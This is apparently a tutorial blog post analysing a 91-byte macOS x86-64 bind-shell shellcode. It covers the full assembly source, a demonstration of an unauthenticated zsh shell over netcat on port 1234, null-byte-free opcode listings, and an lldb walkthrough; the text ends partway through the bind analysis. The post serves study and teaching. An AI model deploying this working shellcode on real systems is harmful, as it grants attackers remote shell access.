Binding a shell

MacOS Shellcode Primer #3

Abstract

In this series of articles, I am analysing the pieces of shellcode written by Odzhan on the page Shellcode: Mac OSX amd64.

In the last article, Some more shellcode, I showed some basic static and dynamic binary analysis using Hopper.

In this article we tackle a more complex task: we want to create some code that binds a shell.

Binding a Shell

This is the wet dream of all hackers - and conversely, it is the nightmare of all blue teamers. This shellcode opens a listening socket on port 1234 and hands a shell to whoever connects to it, for instance via netcat.

The code

We start from the code:

; 91 bytes bind shell
;
bits    64

global _main
_main:

    mov     eax, ~0xd2040200 & 0xFFFFFFFF
    not     eax
    push    rax

    xor     ebp, ebp
    bts     ebp, 25

    ; step 1, create a socket
    ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    push    rbp
    pop     rax              ; rax = 0x02000000
    cdq                      ; rdx = IPPROTO_IP
    push    1
    pop     rsi              ; rsi = SOCK_STREAM
    push    2
    pop     rdi              ; rdi = AF_INET
    mov     al, 97           ; eax = sys_socket
    syscall

    xchg    eax, edi         ; edi=s
    xchg    eax, ebx         ; ebx=2

    ; step 2, bind to port 1234
    ; bind(s, {AF_INET,1234,INADDR_ANY}, 16)
    push    rbp
    pop     rax
    push    rsp
    pop     rsi
    mov     dl, 16
    mov     al, 104
    syscall

    ; step 3, listen
    ; listen(s, 0);
    push    rax
    pop     rsi
    push    rbp
    pop     rax
    mov     al, 106
    syscall

    ; step 4, accept connections
    ; accept(s, 0, 0);
    push    rbp
    pop     rax
    mov     al, 30
    cdq
    syscall

    xchg    eax, edi         ; edi=r
    push    rbx              ; rsi=2
    pop     rsi

    ; step 5, assign socket handle to stdin,stdout,stderr
    ; dup2(r, FILENO_STDIN)
    ; dup2(r, FILENO_STDOUT)
    ; dup2(r, FILENO_STDERR)
dup_loop64:
    push    rbp
    pop     rax
    mov     al, 90           ; rax=sys_dup2
    syscall
    sub     esi, 1
    jns     dup_loop64       ; jump if not signed

    ; step 6, execute /bin/zsh
    ; execve("/bin/zsh", NULL, NULL);
    xor     esi, esi
    cdq                      ; rdx=0
    mov     rbx, '/bin/zsh'
    push    rdx              ; 0
    push    rbx              ; "/bin/zsh"
    push    rsp
    pop     rdi              ; rdi = pointer to "/bin/zsh", 0
    ; ---------
    push    rbp
    pop     rax
    mov     al, 59           ; rax=sys_execve
    syscall

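The only detail that's been changed from the original code is the chosen shell. We opted for zsh because it has been the default shell on macOS since Catalina. The original shell was /bin//sh: observe the double slash, which pads the path to exactly 8 bytes so that it fills a 64-bit register without leaving a null byte. (The disassembly listings further down still show the bytes of the original /bin//sh string.)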

Running the code

In a terminal, I launch:

gbiondo@tripleX Odzhan % ./bindshell

(no output is produced)

In another terminal, I launch:

gbiondo@tripleX shellcode2 % nc localhost 1234
pwd
/Users/gbiondo/EXP312/Odzhan
time

real    0m0.001s
user    0m0.000s
sys    0m0.000s
date
Wed Apr 13 14:52:30 BST 2022
echo $SHELL
/bin/zsh
whoami
gbiondo

Just imagine: the software you are running opens a shell that is reachable from the outside by anyone who can connect to port 1234, with no authentication at all. This is very dangerous.

Some static binary analysis

file

gbiondo@tripleX Odzhan % file bindshell
bindshell: Mach-O 64-bit executable x86_64

Nothing we didn't know before, actually.

Symbol Table

gbiondo@tripleX Odzhan % objdump -m -t bindshell
bindshell:

SYMBOL TABLE:
0000000100003f96 l     F __TEXT,__text dup_loop64
0000000100000000 g       *ABS* __mh_execute_header
0000000100003f5d g     F __TEXT,__text _main

Nothing too interesting, actually.

Section headers

gbiondo@tripleX Odzhan % objdump -m -h bindshell

Sections:
Idx Name          Size     VMA              Type
  0 __text        0000005b 0000000100003f5d TEXT
  1 __unwind_info 00000048 0000000100003fb8 DATA

Also this one is not too talkative :)
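Still, the two listings confirm a couple of numbers. The following is a minimal Python sketch, used here only as a calculator (the variable names are mine and not part of any tool), which checks that the size of __text matches the 91 bytes announced in the source comment and computes where dup_loop64 sits relative to _main:

```python
# Values copied from the objdump listings above.
MAIN_ADDR = 0x100003F5D         # _main, also the start of __text
DUP_LOOP_ADDR = 0x100003F96     # dup_loop64
TEXT_SIZE = 0x5B                # size of __text
UNWIND_INFO_ADDR = 0x100003FB8  # start of __unwind_info

# Size of the code in decimal.
text_size_decimal = TEXT_SIZE

# Address of the first byte after __text.
text_end = MAIN_ADDR + TEXT_SIZE

# Offset of the dup2 loop inside the shellcode.
dup_loop_offset = DUP_LOOP_ADDR - MAIN_ADDR

print(text_size_decimal, hex(text_end), dup_loop_offset)
```

The end of __text coincides with the start of __unwind_info, so the 91 bytes are all there is to the code.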

Null-byte sanitization

Before doing anything else, we subdivide the code into logical blocks, and we agree on the following names:

  • preamble: the beginning of the program, up to the comment ; step 1, create a socket
  • socket: the block of code between the comments ; step 1, create a socket and ; step 2, bind to port 1234
  • bind: the block of code between the comments ; step 2, bind to port 1234 and ; step 3, listen
  • listen: the block of code between the comments ; step 3, listen and ; step 4, accept connections
  • accept connections: the block of code between the comments ; step 4, accept connections and ; step 5, assign socket handle to stdin,stdout,stderr
  • handle management: the block of code between the comments ; step 5, assign socket handle to stdin,stdout,stderr and ; step 6, execute /bin/zsh
  • shell execution: the rest of the code

For reasons that will be evident later on, we need the code to be free of null bytes. A null byte is simply a byte whose value is 00 among the opcodes. An example explains the situation better. If we take a look at the opcodes in the disassembled object file of cmdRun, the program we used in Some more shellcode, in the subroutine <l_cmd64> we see:

gbiondo@tripleX Odzhan % objdump -D -M intel cmdRun.o

cmdRun.o:    file format mach-o 64-bit x86-64

Disassembly of section __TEXT,__text:

--8< --8< --8< SNIP --8< --8< --8< 

0000000000000026 <l_cmd64>:
      26: e8 f5 ff ff ff                   call    0x20 <r_cmd64>
      2b: 63 61 74                         movsxd    esp, dword ptr [rcx + 116]
      2e: 20 2f                            and    byte ptr [rdi], ch
      30: 65 74 63                         je    0x96 <l_cmd64+0x70>
      33: 2f                               <unknown>
      34: 70 61                            jo    0x97 <l_cmd64+0x71>
      36: 73 73                            jae    0xab <l_cmd64+0x85>
      38: 77 64                            ja    0x9e <l_cmd64+0x78>
      3a: 00                               <unknown>

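The byte at offset 3a is 00. There it is acceptable, because it terminates the command string (the bytes from 2b to 39 are the ASCII text cat /etc/passwd, which objdump tries to decode as instructions), but in general we want to avoid these bytes.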

So, now we want to check if we have any null-byte in the opcodes.

We do it part by part.
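Reading the opcode column by eye works for short listings, but the check is easy to automate. This is a minimal sketch in Python, assuming the opcode bytes are pasted by hand from the objdump output; null_byte_offsets is a hypothetical helper of mine, not part of any tool:

```python
def null_byte_offsets(code, base=0):
    """Return the address of every 00 byte found in `code`."""
    return [base + i for i, b in enumerate(code) if b == 0]

# Bytes of <l_cmd64>, copied from the listing above (it starts at 0x26).
l_cmd64 = bytes.fromhex(
    "e8 f5 ff ff ff"            # call r_cmd64
    " 63 61 74 20 2f 65 74 63"  # "cat /etc"
    " 2f 70 61 73 73 77 64 00"  # "/passwd" followed by the terminator
)

offsets = null_byte_offsets(l_cmd64, base=0x26)
print([hex(o) for o in offsets])
```

The only offset reported is 0x3a, the string terminator discussed above.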

Preamble

This part is null-byte free:

gbiondo@tripleX bindshell_files % nasm -f macho64 preamble.asm 
gbiondo@tripleX bindshell_files % objdump -D -M intel preamble.o 

preamble.o:    file format mach-o 64-bit x86-64

Disassembly of section __TEXT,__text:

0000000000000000 <_main>:
       0: b8 ff fd fb 2d                   mov    eax, 771489279
       5: f7 d0                            not    eax
       7: 50                               push    rax
       8: 31 ed                            xor    ebp, ebp
       a: 0f ba ed 19                      bts    ebp, 25

Socket

Also this part is null-byte free:

gbiondo@tripleX bindshell_files % nasm -f macho64 socket.asm    
gbiondo@tripleX bindshell_files % objdump -D -M intel socket.o 

socket.o:    file format mach-o 64-bit x86-64

Disassembly of section __TEXT,__text:

0000000000000000 <__text>:
       0: 55                               push    rbp
       1: 58                               pop    rax
       2: 99                               cdq
       3: 6a 01                            push    1
       5: 5e                               pop    rsi
       6: 6a 02                            push    2
       8: 5f                               pop    rdi
       9: b0 61                            mov    al, 97
       b: 0f 05                            syscall
       d: 97                               xchg    eax, edi
       e: 93                               xchg    eax, ebx

Bind

Another part with no null-bytes:

gbiondo@tripleX bindshell_files % nasm -f macho64 bind.asm    
gbiondo@tripleX bindshell_files % objdump -D -M intel bind.o

bind.o:    file format mach-o 64-bit x86-64

Disassembly of section __TEXT,__text:

0000000000000000 <__text>:
       0: 55                               push    rbp
       1: 58                               pop    rax
       2: 54                               push    rsp
       3: 5e                               pop    rsi
       4: b2 10                            mov    dl, 16
       6: b0 68                            mov    al, 104
       8: 0f 05                            syscall

Listen

No null-bytes here...

gbiondo@tripleX bindshell_files % nasm -f macho64 listen.asm 
gbiondo@tripleX bindshell_files % objdump -D -M intel listen.o 

listen.o:    file format mach-o 64-bit x86-64

Disassembly of section __TEXT,__text:

0000000000000000 <__text>:
       0: 50                               push    rax
       1: 5e                               pop    rsi
       2: 55                               push    rbp
       3: 58                               pop    rax
       4: b0 6a                            mov    al, 106
       6: 0f 05                            syscall

Accept connections

... nor here. Bo-ring!

gbiondo@tripleX bindshell_files % nasm -f macho64 acceptConnections.asm 
gbiondo@tripleX bindshell_files % objdump -D -M intel acceptConnections.o 

acceptConnections.o:    file format mach-o 64-bit x86-64

Disassembly of section __TEXT,__text:

0000000000000000 <__text>:
       0: 55                               push    rbp
       1: 58                               pop    rax
       2: b0 1e                            mov    al, 30
       4: 99                               cdq
       5: 0f 05                            syscall
       7: 97                               xchg    eax, edi
       8: 53                               push    rbx
       9: 5e                               pop    rsi

Handle management

Same here.

gbiondo@tripleX bindshell_files % nasm -f macho64 handleManagement.asm   
gbiondo@tripleX bindshell_files % objdump -D -M intel handleManagement.o 

handleManagement.o:    file format mach-o 64-bit x86-64

Disassembly of section __TEXT,__text:

0000000000000000 <dup_loop64>:
       0: 55                               push    rbp
       1: 58                               pop    rax
       2: b0 5a                            mov    al, 90
       4: 0f 05                            syscall
       6: 83 ee 01                         sub    esi, 1
       9: 79 f5                            jns    0x0 <dup_loop64>

Shell execution

And the same goes for the last block.

gbiondo@tripleX bindshell_files % nasm -f macho64 shell.asm             
gbiondo@tripleX bindshell_files % objdump -D -M intel shell.o           

shell.o:    file format mach-o 64-bit x86-64

Disassembly of section __TEXT,__text:

0000000000000000 <__text>:
       0: 31 f6                            xor    esi, esi
       2: 99                               cdq
       3: 48 bb 2f 62 69 6e 2f 2f 73 68    movabs    rbx, 7526411283028599343
       d: 52                               push    rdx
       e: 53                               push    rbx
       f: 54                               push    rsp
      10: 5f                               pop    rdi
      11: 55                               push    rbp
      12: 58                               pop    rax
      13: b0 3b                            mov    al, 59
      15: 0f 05                            syscall

Commentary

All these pieces of code are null-byte free on purpose. The original author wrote the code this way because he wanted portable shellcode: a payload that contains a 00 byte is truncated as soon as it passes through a C string function such as strcpy, which treats that byte as the end of the string.

In a subsequent article, I will explain some techniques that can be used to obtain clean shellcode. For the moment, the objective of this part of the article was simply to show this aspect of shellcode development.
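As a cross-check of the seven listings, the opcode bytes can be glued together and tested in one go. The sketch below is a minimal Python example under the assumption that the bytes were copied correctly from the objdump outputs above; the dictionary keys are just the block names agreed on earlier:

```python
# Opcode bytes copied from the seven objdump listings above.
CHUNKS = {
    "preamble": "b8 ff fd fb 2d f7 d0 50 31 ed 0f ba ed 19",
    "socket": "55 58 99 6a 01 5e 6a 02 5f b0 61 0f 05 97 93",
    "bind": "55 58 54 5e b2 10 b0 68 0f 05",
    "listen": "50 5e 55 58 b0 6a 0f 05",
    "accept connections": "55 58 b0 1e 99 0f 05 97 53 5e",
    "handle management": "55 58 b0 5a 0f 05 83 ee 01 79 f5",
    "shell execution": "31 f6 99 48 bb 2f 62 69 6e 2f 2f 73 68"
                       " 52 53 54 5f 55 58 b0 3b 0f 05",
}

# The complete shellcode is the concatenation of the blocks, in order.
shellcode = b"".join(bytes.fromhex(h) for h in CHUNKS.values())

# Names of the blocks that contain at least one 00 byte.
chunks_with_nulls = [n for n, h in CHUNKS.items() if 0 in bytes.fromhex(h)]

print(len(shellcode), chunks_with_nulls)
```

The total length is the 91 bytes announced in the first line of the source, and no block is reported as containing a null byte.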

Dynamic binary analysis

Also in this case, we can use the taxonomy defined above to keep the structure a bit more readable.

If not done yet, we start by assembling and linking the executable. The last command loads the executable into lldb.

gbiondo@tripleX bindshell_files % nasm -f macho64 bindshell.asm  
gbiondo@tripleX bindshell_files % ld -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib -lSystem bindshell.o -o bindshell
gbiondo@tripleX bindshell_files % lldb bindshell

We set a breakpoint in the main subroutine, and we're ready to go.

(lldb) breakpoint set -n main
Breakpoint 1: where = bindshell`main, address = 0x0000000100003f5d

Preamble

The preamble disassembled code is as follows:

bindshell[0x100003f5d] <+0>:  mov    eax, 0x2dfbfdff
bindshell[0x100003f62] <+5>:  not    eax
bindshell[0x100003f64] <+7>:  push   rax
bindshell[0x100003f65] <+8>:  xor    ebp, ebp
bindshell[0x100003f67] <+10>: bts    ebp, 0x19

The readers should be familiar with the instruction mov by now, so I am not going to explain it. On the other hand, it is interesting to understand how ~0xd2040200 & 0xFFFFFFFF becomes 0x2dfbfdff. The tilde ~ operator inverts every bit of its operand. The & operator does a bitwise AND: since FF is all ones, which is the neutral element for the & operation, masking with 0xFFFFFFFF leaves the low 32 bits untouched and only discards whatever the complement produced above them, so that the result fits in eax. I have prepared an image that explains how the operation went here - a picture is worth more than a thousand words, after all...

[Image: complement table (Tabella Complemento.png)]
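The same computation can be replayed in a few lines. This is a minimal Python sketch (Python is my choice for the illustration, and imm32_bytes is a hypothetical helper); it also shows why the trick is needed, by listing the bytes each immediate would occupy in the opcode:

```python
PLAIN = 0xD2040200  # the value the shellcode needs in eax

# What the assembler computes for ~0xd2040200 & 0xFFFFFFFF.
# Python integers are unbounded, so the mask is what keeps the
# result within 32 bits.
encoded = ~PLAIN & 0xFFFFFFFF

# What `not eax` computes at run time on the 32-bit register.
decoded = ~encoded & 0xFFFFFFFF

def imm32_bytes(value):
    """Little-endian bytes of a 32-bit immediate, as stored in the opcode."""
    return value.to_bytes(4, "little")

print(hex(encoded), imm32_bytes(PLAIN).hex(), imm32_bytes(encoded).hex())
```

The plain value would be stored as 00 02 04 d2, with a null byte in front, whereas the complemented one is stored as ff fd fb 2d, exactly the bytes that follow b8 in the listing.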

We start the process and begin debugging. Before the execution of instruction at <+0> we have:

(lldb) register read RAX EAX
     rax = 0x0000000100074010  dyld`dyld4::sConfigBuffer
     eax = 0x00074010

and after it, obviously, we obtain:

(lldb) register read RAX EAX
     rax = 0x000000002dfbfdff
     eax = 0x2dfbfdff

Now the following instruction (at <+5>) is a NOT, and after its execution, we have:

(lldb) register read RAX EAX RSP
     rax = 0x00000000d2040200
     eax = 0xd2040200
     rsp = 0x00007ff7bfeff818

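Unsurprisingly, since NOT is an involution: applying it twice gives back the original value. All this has been done in order to avoid storing null bytes, because the immediate 0xd2040200, written directly, would put a 00 byte in the opcode.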

The next instruction (<+7>) pushes the contents of RAX onto the stack (that is, at the address 0x00007ff7bfeff810):

(lldb) register read RAX EAX RSP EBP
     rax = 0x00000000d2040200
     eax = 0xd2040200
     rsp = 0x00007ff7bfeff810
     ebp = 0xbfeff920
(lldb) memory read $rsp
0x7ff7bfeff810: 00 02 04 d2 00 00 00 00 1e d5 00 00 01 00 00 00  ................
0x7ff7bfeff820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

With the next instruction (<+8>) the contents of ebp are zeroed, and with the one after (<+10>) bit 25 of ebp (counting from bit 0) is set to 1, which gives 0x02000000:

(lldb) register read RAX EAX RSP EBP
     rax = 0x00000000d2040200
     eax = 0xd2040200
     rsp = 0x00007ff7bfeff810
     ebp = 0x02000000

This closes the analysis of the first chunk.
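The xor/bts pair is one more way of avoiding null bytes. A minimal Python sketch of the two instructions follows; the comparison with a direct immediate is my own illustration and not something stated in the original source:

```python
ebp = 0            # xor ebp, ebp
ebp |= 1 << 25     # bts ebp, 25: set bit 25, counting from bit 0

# Little-endian bytes that a plain 32-bit immediate 0x02000000 would need.
direct_immediate = ebp.to_bytes(4, "little")

# Bytes actually used by the two instructions, from the listing above.
used_opcodes = bytes.fromhex("31 ed 0f ba ed 19")

print(hex(ebp), direct_immediate.hex(), 0 in used_opcodes)
```

Loading 0x02000000 as an immediate would require three 00 bytes, while the six bytes of xor and bts contain none.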

Socket

The disassembled code for Socket is:

    0x100003f6b <+14>: push   rbp
    0x100003f6c <+15>: pop    rax
    0x100003f6d <+16>: cdq    
    0x100003f6e <+17>: push   0x1
    0x100003f70 <+19>: pop    rsi
    0x100003f71 <+20>: push   0x2
    0x100003f73 <+22>: pop    rdi
    0x100003f74 <+23>: mov    al, 0x61
    0x100003f76 <+25>: syscall 
    0x100003f78 <+27>: xchg   eax, edi
    0x100003f79 <+28>: xchg   eax, ebx

The contents of rbp are pushed onto the stack (instruction <+14>), and then popped into rax (instruction <+15>). After instruction <+14> we have:

(lldb) register read RAX EAX RSP EBP
     rax = 0x00000000d2040200
     eax = 0xd2040200
     rsp = 0x00007ff7bfeff808
     ebp = 0x02000000
(lldb) memory read $rsp
0x7ff7bfeff808: 00 00 00 02 00 00 00 00 00 02 04 d2 00 00 00 00  ................
0x7ff7bfeff818: 1e d5 00 00 01 00 00 00 00 00 00 00 00 00 00 00  ................

and after instruction <+15>

(lldb) register read RAX EAX RSP EBP
     rax = 0x0000000002000000
     eax = 0x02000000
     rsp = 0x00007ff7bfeff810
     ebp = 0x02000000

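Now, we have already seen the CDQ instruction (convert doubleword to quadword): it sign-extends EAX into the pair EDX:EAX. EAX itself is left untouched, while EDX is filled with copies of the sign bit of EAX; in this case EAX is positive, so EDX is zeroed (and so is RDX, since writing a 32-bit register clears the upper half of the 64-bit one). In short, before instruction <+16> we have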

(lldb) register read RSP EBP    DX AX EDX EAX RDX RAX
     rsp = 0x00007ff7bfeff810
     ebp = 0x02000000
      dx = 0xf958
      ax = 0x0000
     edx = 0xbfeff958
     eax = 0x02000000
     rdx = 0x00007ff7bfeff958
     rax = 0x0000000002000000

and after it, we have

     rsp = 0x00007ff7bfeff810
     ebp = 0x02000000
      dx = 0x0000
      ax = 0x0000
     edx = 0x00000000
     eax = 0x02000000
     rdx = 0x0000000000000000
     rax = 0x0000000002000000
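The behaviour of cdq can be modelled in a couple of lines. This is a minimal Python sketch, where cdq is a hypothetical function of mine that returns the value written to edx for a given eax:

```python
def cdq(eax):
    """Return the edx value produced by cdq for a given 32-bit eax."""
    sign_bit = (eax >> 31) & 1
    # edx becomes all ones if eax is negative, all zeroes otherwise.
    return 0xFFFFFFFF if sign_bit else 0x00000000

edx = cdq(0x02000000)   # the case seen in the debugger
print(hex(edx), hex(cdq(0x80000000)))
```

With eax = 0x02000000 the sign bit is clear, so cdq is here just a one-byte way of zeroing edx, which is what the third argument (IPPROTO_IP = 0) needs.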

Then 1 is pushed onto the stack (instruction <+17>):

(lldb) memory read $rsp
0x7ff7bfeff808: 01 00 00 00 00 00 00 00 00 02 04 d2 00 00 00 00  ................
0x7ff7bfeff818: 1e d5 00 00 01 00 00 00 00 00 00 00 00 00 00 00  ................
(lldb) register read RSP EBP RSI RDI DX AX EDX EAX RDX RAX
     rsp = 0x00007ff7bfeff808
     ebp = 0x02000000
     rsi = 0x00007ff7bfeff948
     rdi = 0x0000000000000001
      dx = 0x0000
      ax = 0x0000
     edx = 0x00000000
     eax = 0x02000000
     rdx = 0x0000000000000000
     rax = 0x0000000002000000

and popped back into rsi (instruction <+19>).

(lldb) register read RSP EBP RSI RDI DX AX EDX EAX RDX RAX
     rsp = 0x00007ff7bfeff810
     ebp = 0x02000000
     rsi = 0x0000000000000001
     rdi = 0x0000000000000001
      dx = 0x0000
      ax = 0x0000
     edx = 0x00000000
     eax = 0x02000000
     rdx = 0x0000000000000000
     rax = 0x0000000002000000
(lldb) memory read $rsp
0x7ff7bfeff810: 00 02 04 d2 00 00 00 00 1e d5 00 00 01 00 00 00  ................
0x7ff7bfeff820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

Similarly, the instructions <+20> and <+22> store the value 2 in rdi, leading to the following situation:

(lldb) register read RSP EBP RSI RDI DX AX EDX EAX RDX RAX
     rsp = 0x00007ff7bfeff810
     ebp = 0x02000000
     rsi = 0x0000000000000001
     rdi = 0x0000000000000002
      dx = 0x0000
      ax = 0x0000
     edx = 0x00000000
     eax = 0x02000000
     rdx = 0x0000000000000000
     rax = 0x0000000002000000

The very next instruction (<+23>) moves 0x61 into the lowest 8 bits of eax. 0x61 in decimal is 97. If we look in the syscalls.master file, we immediately notice that this is the number associated with the syscall socket.
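To see what ends up in rax, here is a minimal Python sketch of mov al, 0x61 (mov_al is a hypothetical helper). Splitting the result into a class in the upper byte and a number in the lower bits reflects, as far as I know, how XNU encodes BSD syscall numbers on x86-64; treat that part as an assumption and check it against the XNU sources:

```python
def mov_al(rax, imm8):
    """Replace the lowest 8 bits of rax, as `mov al, imm8` does."""
    return (rax & 0xFFFFFFFFFFFFFF00) | (imm8 & 0xFF)

rax = mov_al(0x02000000, 0x61)

# Assumed encoding: class in bits 24 and above, number in the low 24 bits.
syscall_class = rax >> 24
syscall_number = rax & 0xFFFFFF

print(hex(rax), syscall_class, syscall_number)
```

This is why every block of the shellcode starts with push rbp / pop rax: it reloads 0x02000000 into rax, and only the low byte then has to be changed.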

Now, man 2 socket gives the description of the call, which in C would be invoked as follows:

     #include <sys/socket.h>

     int
     socket(int domain, int type, int protocol);

In short, socket() creates an endpoint for communication and returns a descriptor.

In the man page, we find the description of the parameters:

The domain parameter specifies a communications domain within which communication will take place; this selects the protocol family which should be used.

These families are defined in the include file ⟨sys/socket.h⟩. The currently understood formats are:

PF_LOCAL        Host-internal protocols, formerly called PF_UNIX,
PF_UNIX         Host-internal protocols, deprecated, use PF_LOCAL,
PF_INET         Internet version 4 protocols,
PF_ROUTE        Internal Routing protocol,
PF_KEY          Internal key-management function,
PF_INET6        Internet version 6 protocols,
PF_SYSTEM       System domain,
PF_NDRV         Raw access to network device,
PF_VSOCK        VM Sockets protocols

The socket has the indicated type, which specifies the semantics of communication. Currently defined types are:

SOCK_STREAM
SOCK_DGRAM
SOCK_RAW

A SOCK_STREAM type provides sequenced, reliable, two-way connection based byte streams. An out-of-band data transmission mechanism may be supported. A SOCK_DGRAM socket supports datagrams (connectionless, unreliable messages of a fixed (typically small) maximum length). SOCK_RAW sockets provide access to internal network protocols and interfaces. The type SOCK_RAW, which is available only to the super-user.

The protocol specifies a particular protocol to be used with the socket. Normally only a single protocol exists to support a particular socket type within a given protocol family. However, it is possible that many protocols may exist, in which case a particular protocol must be specified in this manner. The protocol number to use is particular to the “communication domain” in which communication is to take place; see protocols(5).

To understand what the author originally wanted to achieve, let's take a look at the code.

The original call to the socket() API was intended to be:

socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

In the socket.h we find the definition of AF_INET as follows:

#define AF_INET         2               /* internetwork: UDP, TCP, etc. */

So, AF_INET and PF_INET are interchangeable here: in the same header, PF_INET is defined as AF_INET.

The author wants a TCP connection, so he decided to use SOCK_STREAM.

Also SOCK_STREAM is defined in socket.h:

#define SOCK_STREAM     1               /* stream socket */

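Finally, the third parameter to the function is IPPROTO_IP. Its value is 0, which asks the kernel to pick the default protocol for the given domain and type, that is, TCP for a SOCK_STREAM socket in the AF_INET domain. The constant is defined in the in.h header: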

#define IPPROTO_IP              0               /* dummy for IP */

To recap, the call should be invoked as:

socket(2,1,0)

so:

Param. no.  Register  Required value
1           RDI       AF_INET = 2
2           RSI       SOCK_STREAM = 1
3           RDX       IPPROTO_IP = 0

Taking a look at the last status of the registers, we see that the program is ready to invoke the socket syscall.
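The three numeric values can also be double-checked without opening the headers. The following is a minimal sketch that uses Python's standard socket module, which exposes the constants under the same names; make_tcp_socket is a hypothetical wrapper added only to show the equivalent high-level call:

```python
import socket

# The three arguments, named as in the C call.
ARGS = (socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)

# Their numeric values, i.e. what must end up in rdi, rsi and rdx.
numeric_args = tuple(int(a) for a in ARGS)
print(numeric_args)

def make_tcp_socket():
    """High-level counterpart of socket(AF_INET, SOCK_STREAM, IPPROTO_IP)."""
    return socket.socket(*ARGS)
```

The values printed are the ones the platform's headers define, so on macOS they should match the table above.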

Let's review the contents of the registers before and after the syscall:

Register  Before              After
RAX       0x0000000002000061  0x0000000000000003
RBX       0x00000001000c0060  0x00000001000c0060
RCX       0x00007ff7bfeffa80  0x0000000100003f78
RDX       0x0000000000000000  0x0000000000000000
RDI       0x0000000000000002  0x0000000000000002
RSI       0x0000000000000001  0x0000000000000001
RBP       0x0000000002000000  0x0000000002000000
RSP       0x00007ff7bfeff870  0x00007ff7bfeff870

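We observe that the values of RAX and RCX have changed. RAX contains the return value of socket, which is a file descriptor (3 in this case). RCX has changed because the syscall instruction saves in it the address of the next instruction: 0x100003f78 is exactly <+27>.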

The part Socket finishes with the two XCHG instructions (<+27> and <+28>). The XCHG instruction exchanges the contents of a register with the contents of another register or the contents of memory locations. It cannot exchange the contents of two memory locations directly.

The effects of these two instructions are:

  • With the first one, the values of eax and edi are swapped.
  • With the second one, the values of eax (former value of edi) and ebx are swapped.

In short, we have:

Register  Before              After
RAX       0x0000000000000003  0x00000000000c0060
RBX       0x00000001000c0060  0x0000000000000002
RDI       0x0000000000000002  0x0000000000000003
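Note that the upper half of the old RBX value did not survive the exchange. A minimal Python sketch of the two xchg instructions (xchg32 is a hypothetical helper that models 32-bit operands inside 64-bit registers) reproduces the table:

```python
MASK32 = 0xFFFFFFFF

def xchg32(a, b):
    """Swap the low 32 bits of two 64-bit registers.

    Writing a 32-bit register clears the upper 32 bits of the full
    register, so both results are truncated to 32 bits.
    """
    return b & MASK32, a & MASK32

# Values before the exchange, from the table above.
rax, rbx, rdi = 0x3, 0x00000001000C0060, 0x2

rax, rdi = xchg32(rax, rdi)   # xchg eax, edi: edi = s
rax, rbx = xchg32(rax, rbx)   # xchg eax, ebx: ebx = 2

print(hex(rax), hex(rbx), hex(rdi))
```

The socket descriptor ends up in rdi, ready to be the first argument of the next calls, and the value 2 is parked in rbx for the dup2 loop.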

Bind

This part is quite complex. The assembled code is not very different from the original - in fact, we have:

    0x100003f7a <+29>: push   rbp
    0x100003f7b <+30>: pop    rax
    0x100003f7c <+31>: push   rsp
    0x100003f7d <+32>: pop    rsi
    0x100003f7e <+33>: mov    dl, 0x10
    0x100003f80 <+35>: mov    al, 0x68
    0x100003f82 <+37>: syscall

Whilst the pushes and the pops look quite familiar, the mov instructions deserve some analysis.

The effect of the first two instructions is copying the contents of rbp into rax, and the effect of the third and fourth instructions is copying the contents of rsp into rsi. Let's look at the first pair: with the first instruction (<+29>) the contents of rbp are pushed onto the stack, and with the next one they are popped into the RAX register. It's worth remembering that rbp is not used as a frame pointer here: the preamble left the value 0x0000000002000000 in it. The second pair makes rsi point to the top of the stack, which is where the preamble pushed the quadword 0x00000000d2040200.

Before going any further, we observe that the code sets the lowest 8 bits of rax (this is what al is) to 0x68, or 104 in decimal. This is the number of the syscall that will be invoked. A quick look in the syscalls.master file shows that this is the syscall:

104    AUE_BIND    ALL    { int bind(int s, caddr_t name, socklen_t namelen) NO_SYSCALL_STUB; }

so we know we need to invoke man 2 bind from the terminal to get some more information on the API. In this case, we have:

#include <sys/socket.h>

int bind(int socket, const struct sockaddr *address, socklen_t address_len);

bind() assigns a name to an unnamed socket. When a socket is created with socket(2) it exists in a name space (address family) but has no name assigned. bind() requests that address be assigned to the socket.

The second parameter to this call is a pointer to a struct sockaddr, and the third is basically an integer containing the length of that structure.

We need to dig into the Apple XNU headers now.

For AF_INET sockets, the structure actually passed is struct sockaddr_in, which is described in the file in.h:

struct sockaddr_in {
    __uint8_t       sin_len;
    sa_family_t     sin_family;
    in_port_t       sin_port;
    struct  in_addr sin_addr;
    char            sin_zero[8];
};

In order to find the third parameter, we need to determine the sizes of all types. In the same file, we immediately find

struct in_addr {
    in_addr_t s_addr;
};

so we need to give a size to the following types:

Data type    Defined in
sa_family_t  _sa_family_t.h
in_port_t    _in_port_t.h
in_addr      in.h

To speed up things, we wrote a little program to find the sizes of the integer types:

#include <iostream>
#include <inttypes.h>

using namespace std;

int main ()
{
  cout << "sizeof size_t type is: " << sizeof(size_t) << " bytes\n";
  cout << "sizeof char type is: " << sizeof(char) << " bytes\n";
  cout << "sizeof uint8_t type is: " << sizeof(uint8_t) << " bytes\n";
  cout << "sizeof __uint8_t type is: " << sizeof(__uint8_t) << " bytes\n";
  cout << "sizeof uint16_t type is: " << sizeof(uint16_t) << " bytes\n";
  cout << "sizeof __uint16_t type is: " << sizeof(__uint16_t) << " bytes\n";
  cout << "sizeof uint32_t type is: " << sizeof(uint32_t) << " bytes\n";
  cout << "sizeof __uint32_t type is: " << sizeof(__uint32_t) << " bytes\n";
  cout << "sizeof uint64_t type is: " << sizeof(uint64_t) << " bytes\n";
  cout << "sizeof __uint64_t type is: " << sizeof(__uint64_t) << " bytes\n";
  return 0;
}

running it gives us:

sizeof size_t type is: 8 bytes
sizeof char type is: 1 bytes
sizeof uint8_t type is: 1 bytes
sizeof __uint8_t type is: 1 bytes
sizeof uint16_t type is: 2 bytes
sizeof __uint16_t type is: 2 bytes
sizeof uint32_t type is: 4 bytes
sizeof __uint32_t type is: 4 bytes
sizeof uint64_t type is: 8 bytes
sizeof __uint64_t type is: 8 bytes

So, let's enrich the previous table:

Data type    Defined in      Aliases                 Size
char         n/a             n/a                     1 byte
uint8_t      n/a             unsigned char           1 byte
sa_family_t  _sa_family_t.h  __uint8_t               1 byte
in_port_t    _in_port_t.h    __uint16_t              2 bytes
in_addr      in.h            struct, one in_addr_t   4 bytes
in_addr_t    _in_addr_t.h    __uint32_t              4 bytes

